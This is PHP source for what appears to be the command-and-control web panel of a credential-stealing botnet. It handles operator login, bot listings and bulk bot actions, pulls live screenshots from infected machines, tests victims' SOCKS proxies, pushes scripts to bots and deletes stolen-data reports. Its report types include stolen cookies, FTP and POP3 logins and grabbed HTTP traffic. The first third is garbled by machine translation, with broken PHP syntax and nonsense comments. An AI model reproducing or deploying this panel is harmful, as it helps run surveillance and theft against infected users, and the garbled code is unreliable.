require_once (THEME_PATH. '/ index.php');
/ Management / login.
if (! empty ($ _GET [QUERY_VAR_MODULE]))
{ / / Login form.
if (strcmp ($ _GET [QUERY_VAR_MODULE], 'login') === 0)
{ UnlockSessionAndDestroyAllCokies ();
if (isset ($ _POST ['user']) & & isset ($ _POST ['pass'])) {
$ User = $ _POST ['user'];
$ Pass = md5 ($ _POST ['pass']);
/ / Check the login.
if (@ mysql_query ("SELECT id FROM cp_users WHERE name = '". addslashes ($ user). "' AND pass = '". addslashes ($ pass). "'
AND flag_enabled = '1 'LIMIT 1") & & @ mysql_affected_rows () == 1)
{
if (isset ($ _POST ['remember']) & & $ _POST ['remember'] == 1) {
setcookie (COOKIE_USER, md5 ($ user), COOKIE_LIVETIME, CP_HTTP_ROOT);
setcookie (COOKIE_PASS, $ pass, COOKIE_LIVETIME, CP_HTTP_ROOT); }
LockSession (); $ _SESSION ['Name'] = $ user;
$ _SESSION ['Pass'] = $ pass;
/ / UnlockSession ();
header ('Location:'. QUERY_STRING_BLANK. 'home');
} else ShowLoginForm (true);
die ();
}
ShowLoginForm (false);
die (); }
/ / Exit if (strcmp ($ _GET ['m'], 'logout') === 0)
{
UnlockSessionAndDestroyAllCokies (); header ('Location:'. QUERY_STRING_BLANK. 'login');
die ();
} }
////////////////////////////////////////////////// /////////////////////////////
/ / Check the login data.
////////////////////////////////////////////////// /////////////////////////////
$ Logined = 0, / / flag means zalogininy we.
/ / Login through the session.
LockSession ();
if (! empty ($ _SESSION ['name']) & &! empty ($ _SESSION ['pass'])) {
if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE name = '". addslashes ($ _SESSION [' name'])."' AND pass = '".
addslashes ($ _SESSION [' pass']). "'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @ mysql_affected_rows (); }
/ / Login through cookies.
if ($ logined! == 1 & &! empty ($ _COOKIE [COOKIE_USER]) & &! empty ($ _COOKIE [COOKIE_PASS])) {
if (($ r = @ mysql_query ("SELECT * FROM cp_users WHERE MD5 (name )='". addslashes ($ _COOKIE [COOKIE_USER ])."'
AND pass = '". addslashes ($ _COOKIE [COOKIE_PASS]). " 'AND flag_enabled = '1' LIMIT 1 ")))$ logined = @
mysql_affected_rows ();
} / / Unable to login.
if ($ logined! == 1)
{ UnlockSessionAndDestroyAllCokies ();
header ('Location:'. QUERY_STRING_BLANK. 'login');
die (); }
/ / Get the user data. $ _USER_DATA = @ Mysql_fetch_assoc ($ r);
if ($ _USER_DATA === false) die (mysql_error_ex ());
$ _SESSION ['Name'] = $ _USER_DATA ['name']; $ _SESSION ['Pass'] = $ _USER_DATA ['pass'];
/ / Connect the tongue. if (@ strlen ($ _USER_DATA ['language'])! = 2 | |! SafePath ($ _USER_DATA ['language']) | |! file_exists ('system / lng .'.$_
USER_DATA [' language '].' . php'))$_ USER_DATA ['language'] = DEFAULT_LANGUAGE;
require_once ('system / lng .'.$_ USER_DATA [' language'].'. php ');
UnlockSession ();
////////////////////////////////////////////////// /////////////////////////////
/ / Define the menu.
////////////////////////////////////////////////// /////////////////////////////
/ / Main Menu.
$ _MAINMENU = Array (/ / module. / / Title. / / Required Rights. array (0, LNG_MM_STATS, array ()),
array ('stats_main', LNG_MM_STATS_MAIN, array ('r_stats_main')),
array ('stats_os', LNG_MM_STATS_OS, array ('r_stats_os')),
array (0, LNG_MM_BOTNET, array ()),
array ('botnet_bots', LNG_MM_BOTNET_BOTS, array ('r_botnet_bots')), array ('botnet_scripts', LNG_MM_BOTNET_SCRIPTS, array ('r_botnet_scripts')),
array (0, LNG_MM_REPORTS, array ()), array ('reports_db', LNG_MM_REPORTS_DB, array ('r_reports_db')),
array ('reports_files', LNG_MM_REPORTS_FILES, array ('r_reports_files')),
array ('reports_jn', LNG_MM_REPORTS_JN, array ('r_reports_jn')),
array (0, LNG_MM_SYSTEM, array ()),
array ('sys_info', LNG_MM_SYSTEM_INFO, array ('r_system_info')), array ('sys_options', LNG_MM_SYSTEM_OPTIONS, array ('r_system_options')),
array ('sys_user', LNG_MM_SYSTEM_USER, array ('r_system_user')),
array ('sys_users', LNG_MM_SYSTEM_USERS, array ('r_system_users')) );
/ / Menu Deytvie over bot. Also used for an array of bots. $ _BOT_MENU = Array (
array ('fullinfo', LNG_MBA_FULLINFO, array ('r_botnet_bots')), array ('fullinfoss', LNG_MBA_FULLINFOSS, array ('r_botnet_bots')),
array (0, LNG_MBA_SEPARATOR, array ()), array ('today_dbreports', LNG_MBA_TODAY_DBREPORTS, array ('r_reports_db')),
array ('week_dbreports', LNG_MBA_WEEK_DBREPORTS, array ('r_reports_db')),
array ('files', LNG_MBA_FILES, array ('r_reports_files')),
array (0, LNG_MBA_SEPARATOR, array ()),
array ('remove', LNG_MBA_REMOVE, array ('r_edit_bots')), array ('removeex', LNG_MBA_REMOVE_REPORTS, array ('r_edit_bots', 'r_reports_db_edit', 'r_reports_files_edit')),
array (0, LNG_MBA_SEPARATOR, array ()), array ('port_socks', LNG_MBA_PORT_SOCKS, array ('r_botnet_bots')),
array ('newscript', LNG_MBA_NEWSCRIPT, array ('r_botnet_scripts_edit'))
);
OptimizeMenu ($ _BOT_MENU, false);
////////////////////////////////////////////////// /////////////////////////////
/ / Handle the group of bots. ////////////////////////////////////////////////// /////////////////////////////
if((!empty($_GET['botsaction']) || !empty($_POST['botsaction'])) && ((!empty($_POST['bots']) && is_array($_POST['bots'])) || (!empty($_GET['bots']) && is_array($_GET['bots']))))
{
  $bedit = empty($_USER_DATA['r_edit_bots']) ? 0 : 1;
  $ba    = !empty($_GET['botsaction']) ? $_GET['botsaction'] : $_POST['botsaction'];
  $blist = !empty($_POST['bots']) && is_array($_POST['bots']) ? $_POST['bots'] : $_GET['bots'];
  $blist = array_unique($blist);

  // Check that the current user is allowed to perform this action (it must appear in $_BOT_MENU).
  $deny = true;
  foreach($_BOT_MENU as $item) if($item[0] !== 0 && strcmp($item[0], $ba) === 0){$deny = false; break;}
  if($deny) ThemeFatalError(LNG_ACCESS_DEFINED);

  // Convert the list of bots into a MySQL WHERE condition.
  $sql_blist = '';
  $count = 0;
  foreach($blist as $bot) $sql_blist .= ($count++ == 0 ? '' : ' OR ')."bot_id='".addslashes($bot)."'";

  if(strcmp($ba, 'fullinfo') === 0 || strcmp($ba, 'fullinfoss') === 0)
  {
    // Update mode: save the 'used' flag and the comments posted from the form.
    if($bedit && isset($_GET['save']) && (isset($_POST['used']) && is_array($_POST['used'])) && (isset($_POST['comments']) && is_array($_POST['comments'])))
    {
      $q = '';
      foreach($blist as $i => $bot) if(isset($_POST['used'][$i]) && isset($_POST['comments'][$i]))
      {
        @mysql_query("UPDATE botnet_list SET flag_used='".($_POST['used'][$i] == 1 ? 1 : 0)."', comments='".addslashes(substr($_POST['comments'][$i], 0, 250))."' WHERE bot_id='".addslashes($bot)."' LIMIT 1");
        $q .= '&bots[]='.urlencode($bot);
      }
      header('Location: '.QUERY_SCRIPT.'?botsaction='.urlencode($ba).$q);
      die();
    }

    // Screenshot: connect to the bot's address, request an image and stream it to the browser.
    if(strcmp($ba, 'fullinfoss') === 0 && isset($_GET['ipv4']) && isset($_GET['port']))
    {
      $format = 'image/'.$_USER_DATA['ss_format'];
      $data   = 0;
      if(($sock = @fsockopen($_GET['ipv4'], $_GET['port'], $errn, $errs, 5)))
      {
        @stream_set_timeout($sock, 5);
        @fwrite($sock, pack('LLL', 10, strlen($format) + 4, $_USER_DATA['ss_quality']).$format);
        @fflush($sock);
        if(($fs = @fread($sock, 8)) && ($fs = @unpack('L2', $fs)))
        {
          // $fs[1] is the total image size, $fs[2] the chunk size; every chunk is acknowledged before the next one is read.
          while($data < $fs[1] && !@feof($sock))
          {
            $need = min($fs[2], $fs[1] - $data);
            if(!($td = @fread($sock, $need))) break;
            $sm = strlen($td);
            while($sm < $need && !@feof($sock) && ($td2 = @fread($sock, $need - $sm))){$sm += strlen($td2); $td .= $td2;}
            if($data == 0) header('Content-Type: '.$format);
            $data += $sm;
            echo $td;
            if(!@fwrite($sock, pack('L', $fs[2]))) break;
            @fflush($sock);
          }
        }
        @fclose($sock);
      }
      if($data === 0)
      {
        header('Content-Type: image/png');
        echo file_get_contents(THEME_PATH.'/failed.png');
      }
      die();
    }

    // Output.
    if(!($r = @mysql_query('SELECT *, IF(rtime_last >= \''.ONLINE_TIME_MIN.'\', 1, 0) AS is_online FROM botnet_list WHERE '.$sql_blist))) ThemeMySQLError();
    // Fetch the result.
    $res = array();
    while(($m = @mysql_fetch_assoc($r))) $res[$m['bot_id']] = $m;
    mysql_free_result($r);
    unset($m);
    // Display the result.
    $e_count = 0;
    $data    = '';
    if($bedit) $data .= str_replace(array('{NAME}', '{URL}', '{JS_EVENTS}'), array('edit', QUERY_SCRIPT_HTML.'?botsaction='.$ba.'&save=1', ''), THEME_FORMPOST_BEGIN);
    $data .=
      str_replace('{WIDTH}', '90%', THEME_DIALOG_BEGIN).
      str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(1, LNG_BA_FULLINFO_TITLE), THEME_DIALOG_TITLE).
      THEME_DIALOG_ROW_BEGIN.
      str_replace('{COLUMNS_COUNT}', 1, THEME_DIALOG_ITEM_CHILD_BEGIN);
    foreach($blist as $bot)
    {
      $data .=
        str_replace('{WIDTH}', '100%', THEME_LIST_BEGIN).
        THEME_LIST_ROW_BEGIN.
        str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_BOTID), THEME_LIST_ITEM_LTEXT_U1).
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', BotPopupMenu($bot, 'botmenu')), THEME_LIST_ITEM_LTEXT_U1).
        THEME_LIST_ROW_END;

      // Body.
      $is_exists = isset($res[$bot]);
      if(!$is_exists) $data .= THEME_LIST_ROW_BEGIN.str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, LNG_BA_FULLINFO_EMPTY), THEME_LIST_ITEM_EMPTY_1).THEME_LIST_ROW_END;
      else
      {
        $e_count++;
        $l = $res[$bot];
        $data .=
          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_BOTNET), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['botnet'])), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_VERSION), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', IntToVersion($l['bot_version'])), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_OS), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', OSDataToString($l['os_version'])), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_OSLANG), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['language_id'])), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TIMEBIAS), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', TimeBiasToText($l['time_localbias'])), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_COUNTRY), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['country'])), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_IPV4), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['ipv4']).($l['flag_nat'] ? '*' : '')), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_LATENCY), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', number_format_as_float($l['net_latency'] / 1000, 3)), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_PORT_S1), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($l['port_s1'])), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TFIRST), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex(gmdate(LNG_FORMAT_DT, $l['rtime_first']))), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TLAST), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex(gmdate(LNG_FORMAT_DT, $l['rtime_last']))), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_TONLINE), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $l['is_online'] == 1 ? TickCountToTime(CURRENT_TIME - $l['rtime_online']) : LNG_FORMAT_NOTIME), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_INSTALL), THEME_LIST_ITEM_LTEXT_U2).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $l['flag_install'] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U2).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_USED), THEME_LIST_ITEM_LTEXT_U1).
          ($bedit ?
            str_replace(array('{NAME}', '{WIDTH}'), array('used[]', 'auto'), THEME_LIST_ITEM_LISTBOX_U1_BEGIN).
            str_replace(array('{VALUE}', '{TEXT}'), array(0, LNG_NO), $l['flag_used'] != 1 ? THEME_LIST_ITEM_LISTBOX_ITEM_CUR : THEME_LIST_ITEM_LISTBOX_ITEM).
            str_replace(array('{VALUE}', '{TEXT}'), array(1, LNG_YES), $l['flag_used'] == 1 ? THEME_LIST_ITEM_LISTBOX_ITEM_CUR : THEME_LIST_ITEM_LISTBOX_ITEM).
            THEME_LIST_ITEM_LISTBOX_U1_END
          :
            str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $l['flag_used'] == 1 ? LNG_YES : LNG_NO), THEME_LIST_ITEM_LTEXT_U1)
          ).
          THEME_LIST_ROW_END.

          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_COMMENTS), THEME_LIST_ITEM_LTEXT_U2).
          ($bedit ?
            str_replace(array('{NAME}', '{VALUE}', '{MAX}', '{WIDTH}'), array('comments[]', htmlentities_ex($l['comments']), 250, '99%'), THEME_LIST_ITEM_INPUT_TEXT_U2)
          :
            str_replace(array('{WIDTH}', '{TEXT}'), array('auto', empty($l['comments']) ? '-' : htmlentities_ex($l['comments'])), THEME_LIST_ITEM_LTEXT_U2)
          ).
          THEME_LIST_ROW_END;

        if(strcmp($ba, 'fullinfoss') === 0)
        {
          $ss = str_replace('{URL}', htmlentities_ex(QUERY_SCRIPT.'?botsaction=fullinfoss&bots[]=0&ipv4='.urlencode($l['ipv4']).'&port='.urlencode($l['port_s1'])), THEME_SCREENSHOT);
          $data .=
            THEME_LIST_ROW_BEGIN.
            str_replace(array('{WIDTH}', '{TEXT}'), array('1%', LNG_BA_FULLINFO_SCREENSHOT), THEME_LIST_ITEM_LTEXT_U1).
            str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $ss), THEME_LIST_ITEM_LTEXT_U1).
            THEME_LIST_ROW_END;
        }
      }

      // Ending.
      $data .= THEME_LIST_END.($bedit && $is_exists ? str_replace(array('{NAME}', '{VALUE}'), array('bots[]', htmlentities_ex($bot)), THEME_FORM_VALUE) : '').THEME_VSPACE;
    }

    $data .=
      THEME_DIALOG_ITEM_CHILD_END.
      THEME_DIALOG_ROW_END;

    if($bedit && $e_count > 0)
    {
      $data .=
        str_replace('{COLUMNS_COUNT}', 1, THEME_DIALOG_ACTIONLIST_BEGIN).
        str_replace(array('{TEXT}', '{JS_EVENTS}'), array(LNG_BA_FULLINFO_ACTION_SAVE, ''), THEME_DIALOG_ITEM_ACTION_SUBMIT).
        THEME_DIALOG_ACTIONLIST_END;
    }

    $data .= THEME_DIALOG_END.($bedit ? THEME_FORMPOST_END : '');
    ThemeSmall(LNG_BA_FULLINFO_TITLE, $data, 0, GetBotJSMenu('botmenu'), 0);
  }
  else if(strcmp($ba, 'today_dbreports') === 0 || strcmp($ba, 'week_dbreports') === 0)
  {
    $date2 = gmdate('ymd', CURRENT_TIME);
    $date1 = strcmp($ba, 'week_dbreports') === 0 ? gmdate('ymd', CURRENT_TIME - 518400) : $date2;
    foreach($blist as $k => $v) if(spacechars_exists($v)) $blist[$k] = '"'.$v.'"';
    header('Location: '.QUERY_STRING_BLANK.'reports_db&date1='.urlencode($date1).'&date2='.urlencode($date2).'&bots='.urlencode(implode(' ', $blist)).'&q=');
    die();
  }
  else if(strcmp($ba, 'files') === 0)
  {
    foreach($blist as $k => $v) if(spacechars_exists($v)) $blist[$k] = '"'.$v.'"';
    header('Location: '.QUERY_STRING_BLANK.'reports_files&bots='.urlencode(implode(' ', $blist)).'&q=');
    die();
  }
  else if(strcmp($ba, 'remove') === 0 || strcmp($ba, 'removeex') === 0) // No rights check is needed here: it already happened when $_BOT_MENU was built.
  {
    if(isset($_GET['yes']) || isset($_GET['no']))
    {
      $data =
        str_replace('{WIDTH}', 'auto', THEME_LIST_BEGIN).
        str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(2, LNG_BA_REMOVE_TITLE), THEME_LIST_TITLE);

      if(isset($_GET['yes']))
      {
        // Remove from botnet_list.
        if(@mysql_query('DELETE FROM botnet_list WHERE '.$sql_blist)) $t = str_replace('{TEXT}', sprintf(LNG_BA_REMOVE_REMOVED, @mysql_affected_rows()), THEME_STRING_SUCCESS);
        else $t = str_replace('{TEXT}', mysql_error_ex(), THEME_STRING_ERROR);
        $data .=
          THEME_LIST_ROW_BEGIN.
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', 'botnet_list'), THEME_LIST_ITEM_LTEXT_U1).
          str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $t), THEME_LIST_ITEM_LTEXT_U1).
          THEME_LIST_ROW_END;

        // Extended removal: also drop the report rows and report files.
        if(strcmp($ba, 'removeex') === 0)
        {
          $i = 1;
          $rlist = ListReportTables(MYSQL_DB);

          // Remove from botnet_reports_*.
          foreach($rlist as $table)
          {
            if(@mysql_query("DELETE FROM {$table} WHERE ".$sql_blist)) $t = str_replace('{TEXT}', sprintf(LNG_BA_REMOVE_REMOVED, @mysql_affected_rows()), THEME_STRING_SUCCESS);
            else $t = str_replace('{TEXT}', mysql_error_ex(), THEME_STRING_ERROR);
            $item = ($i % 2 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1);
            $data .=
              THEME_LIST_ROW_BEGIN.
              str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($table)), $item).
              str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $t), $item).
              THEME_LIST_ROW_END;
            $i++;
          }

          // Delete files (REPORTS_PATH/<dir>/<botnet>/<bot>).
          $root = getdirs(REPORTS_PATH);
          if($root !== false) foreach($root as $rdir)
          {
            $rdir = REPORTS_PATH.'/'.$rdir;
            $botnets = getdirs($rdir);
            if($botnets !== false) foreach($botnets as $botnet)
            {
              $botnet = $rdir.'/'.$botnet;
              $bots = getdirs($botnet);
              if($bots !== false) foreach($bots as $bot)
              {
                $bot_l = mb_strtolower(urldecode($bot));
                $bot = $botnet.'/'.$bot;
                foreach($blist as $l)
                {
                  if(strcmp($bot_l, mb_strtolower($l)) === 0)
                  {
                    if(ClearPath($bot)) $t = str_replace('{TEXT}', LNG_BA_REMOVE_FREMOVED, THEME_STRING_SUCCESS);
                    else $t = str_replace('{TEXT}', LNG_BA_REMOVE_FERROR, THEME_STRING_ERROR);
                    $item = ($i % 2 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1);
                    $data .=
                      THEME_LIST_ROW_BEGIN.
                      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', htmlentities_ex($bot)), $item).
                      str_replace(array('{WIDTH}', '{TEXT}'), array('auto', $t), $item).
                      THEME_LIST_ROW_END;
                    $i++;
                  }
                }
              }
              unset($bots);
            }
            unset($botnets);
          }
          unset($root);
        }
      }
      else $data .= THEME_LIST_ROW_BEGIN.str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_BA_REMOVE_ABORTED), THEME_LIST_ITEM_LTEXT_U1).THEME_LIST_ROW_END;

      ThemeSmall(LNG_BA_REMOVE_TITLE, $data.THEME_LIST_END, 0, 0, 0);
    }
    else
    {
      // Ask for confirmation, then reload with yes/no appended to the query string.
      $bl = '';
      foreach($blist as $bot) $bl .= '&bots[]='.addjsslashes(urlencode($bot));
      $q  = sprintf(strcmp($ba, 'remove') === 0 ? LNG_BA_REMOVE_Q1 : LNG_BA_REMOVE_Q2, count($blist));
      $js = "function qr(){var r = confirm('".addjsslashes($q)."') ? 'yes' : 'no'; window.location = '".addjsslashes(QUERY_SCRIPT)."?botsaction={$ba}{$bl}&' + r;}";
      ThemeSmall(LNG_BA_REMOVE_TITLE, '', $js, 0, 'onload="qr()"');
    }
  }
  else if(strcmp($ba, 'port_socks') === 0)
  {
    // Check the SOCKS proxy (called via AJAX for one ipv4:port at a time).
    if(isset($_GET['ipv4']) && isset($_GET['port']))
    {
      $ok = 0;
      if(($s = @fsockopen($_GET['ipv4'], $_GET['port'], $errn, $errs, 5)))
      {
        @stream_set_timeout($s, 5);
        $data = pack('CCSL', 4, 1, 0, 0)."\0"; // SOCKS4 header.
        if(@fwrite($s, $data) && ($data = @fread($s, 8)) && strlen($data) == 8) $ok = 1;
        fclose($s);
      }
      if($ok == 1) echo str_replace('{TEXT}', LNG_BA_PORT_SOCKS_SUCCESS, THEME_STRING_SUCCESS);
      else echo str_replace('{TEXT}', LNG_BA_PORT_SOCKS_FAILED, THEME_STRING_ERROR);
      die();
    }

    // Display the list.
    if(!($r = @mysql_query('SELECT bot_id, country, ipv4, port_s1 FROM botnet_list WHERE '.$sql_blist))) ThemeMySQLError();
    // Fetch the result.
    $res = array();
    while(($m = @mysql_fetch_row($r))) $res[$m[0]] = $m;
    mysql_free_result($r);
    unset($m);

    $data =
      str_replace('{WIDTH}', 'auto', THEME_LIST_BEGIN).
      str_replace(array('{COLUMNS_COUNT}', '{TEXT}'), array(3, LNG_BA_PORT_SOCKS_TITLE), THEME_LIST_TITLE);
    $i = 0;
    $jslist = '';

    // Display the result.
    foreach($blist as $bot)
    {
      $is_exists = isset($res[$bot]);
      $item = ((($i++) % 2 == 0) ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2);
      if($is_exists)
      {
        $l = $res[$bot];
        $jslist .= ($jslist == '' ? '' : ',')."['st{$i}', '".addjsslashes(urlencode($l[2]))."', '".addjsslashes(urlencode($l[3]))."']";
      }
      $data .=
        THEME_LIST_ROW_BEGIN.
        str_replace(array('{WIDTH}', '{TEXT}'), array('auto', BotPopupMenu($bot, 'botmenu').' / '.($is_exists ? $l[1] : '-')), $item).
        str_replace(array('{WIDTH}', '{TEXT}'), array('150px', $is_exists ? htmlentities_ex($l[2].':'.$l[3]) : '-:-'), $item).
        str_replace(array('{WIDTH}', '{TEXT}'), array('150px', $is_exists ? str_replace('{ID}', 'st'.$i, THEME_STRING_ID_BEGIN).LNG_BA_PORT_SOCKS_CHECKING.THEME_STRING_ID_END : LNG_BA_PORT_SOCKS_FAILED), $item).
        THEME_LIST_ROW_END;
    }

    // Script for checking the proxies one after another.
    $ajax_err  = addjsslashes(str_replace('{TEXT}', LNG_BA_PORT_SOCKS_ERROR, THEME_STRING_ERROR));
    $ajax_init = JSXMLHttpRequest('sockshttp');
    $q         = addjsslashes(QUERY_SCRIPT.'?botsaction=port_socks&bots[]=0');
    $ajax = <<<JS_SCRIPT
var sockslist = [{$jslist}];
var sockshttp = false;

function StateChange(i)
{
  if(sockshttp.readyState == 4)
  {
    var el = document.getElementById(sockslist[i][0]);
    if(sockshttp.status == 200 && sockshttp.responseText.length > 5) el.innerHTML = sockshttp.responseText;
    else el.innerHTML = '{$ajax_err}';
    SocksCheck(++i);
  }
}

function SocksCheck(i)
{
  if(sockshttp) delete sockshttp;
  if(i < sockslist.length)
  {
    {$ajax_init}
    if(sockshttp)
    {
      sockshttp.onreadystatechange = function(){StateChange(i)};
      sockshttp.open('GET', '{$q}&ipv4=' + sockslist[i][1] + '&port=' + sockslist[i][2], true);
      sockshttp.send(null);
    }
  }
}
JS_SCRIPT;
    ThemeSmall(LNG_BA_PORT_SOCKS_TITLE, $data.THEME_LIST_END, $ajax, GetBotJSMenu('botmenu'), 'onload="SocksCheck(0);"');
  }
  else if(strcmp($ba, 'newscript') === 0)
  {
    foreach($blist as $k => $v) if(spacechars_exists($v)) $blist[$k] = '"'.$v.'"';
    header('Location: '.QUERY_STRING_BLANK.'botnet_scripts&new=-1&bots='.urlencode(implode(' ', $blist)));
    die();
  }
  die();
}

///////////////////////////////////////////////////////////////////////////////
// Start the module.
///////////////////////////////////////////////////////////////////////////////

// Select the module name and remove the menu items that are not needed.
$needed_module = (empty($_GET[QUERY_VAR_MODULE]) ? '' : $_GET[QUERY_VAR_MODULE]);
$curmodule = '';
OptimizeMenu($_MAINMENU, true);
foreach($_MAINMENU as $key => $item) if($item[0] !== 0 && (strcmp($needed_module, $item[0]) === 0 || $curmodule == '')) $curmodule = $item[0];
if($curmodule == '') die('Modules for current user not defined.');

define('CURRENT_MODULE', $curmodule);                                                                                    // The current module.
define('FORM_CURRENT_MODULE', str_replace(array('{NAME}', '{VALUE}'), array('m', $curmodule), THEME_FORM_VALUE)); // Current module parameter for forms.
define('QUERY_STRING', QUERY_STRING_BLANK.CURRENT_MODULE);           // Query string for the current module.
define('QUERY_STRING_HTML', QUERY_STRING_BLANK_HTML.CURRENT_MODULE); // Query string for the current module in HTML format.
unset($needed_module, $curmodule);

// Load the module's language file (fall back to the default language if the user's one is missing).
if(!file_exists('system/'.CURRENT_MODULE.'.lng.'.$_USER_DATA['language'].'.php')) $_USER_DATA['language'] = DEFAULT_LANGUAGE;
require_once('system/'.CURRENT_MODULE.'.lng.'.$_USER_DATA['language'].'.php');

// Start the module.
require_once('system/'.CURRENT_MODULE.'.php');
die();
///////////////////////////////////////////////////////////////////////////////
// Functions.
///////////////////////////////////////////////////////////////////////////////

/*
  Get the MySQL error, HTML-formatted and prefixed.

  Return - string, the MySQL error.
*/
function mysql_error_ex()
{
  return 'MySQL error: '.htmlentities_ex(mysql_error());
}

/*
  Create a temporary file.

  IN $prefix - string, the file name prefix.

  Return - mixed, the new temporary file name, or false on failure.
*/
function CreateTempFile($prefix)
{
  @mkdir('tmp', 0777);
  return @tempnam('tmp', $prefix);
}

/*
  Add the headers for downloading data as a file.

  IN $name - string, the final file name.
  IN $size - size of the file.
*/
function HTTPDownloadHeaders($name, $size)
{
  header('Content-Type: application/octet-stream');
  header('Content-Disposition: attachment; filename='.basename_ex($name));
  header('Content-Transfer-Encoding: binary');
  header('Content-Length: '.$size);
  HTTPNoCacheHeaders();
}

/*
  Convert a BLT_* value to a string.

  IN $type - int, the BLT_* value to convert.

  Return - string, string representation of the BLT_* value.
*/
function BltToLng($type)
{
  switch($type)
  {
    case BLT_PROTECTED_STORAGE:   return LNG_BLT_PROTECTED_STORAGE;
    case BLT_COOKIES_IE:          return LNG_BLT_COOKIES_IE;
    case BLT_FILE:                return LNG_BLT_FILE;
    case BLT_HTTP_REQUEST:        return LNG_BLT_HTTP_REQUEST;
    case BLT_HTTPS_REQUEST:       return LNG_BLT_HTTPS_REQUEST;
    case BLT_LOGIN_FTP:           return LNG_BLT_LOGIN_FTP;
    case BLT_LOGIN_POP3:          return LNG_BLT_LOGIN_POP3;
    case BLT_GRABBED_UI:          return LNG_BLT_GRABBED_UI;
    case BLT_GRABBED_HTTP:        return LNG_BLT_GRABBED_HTTP;
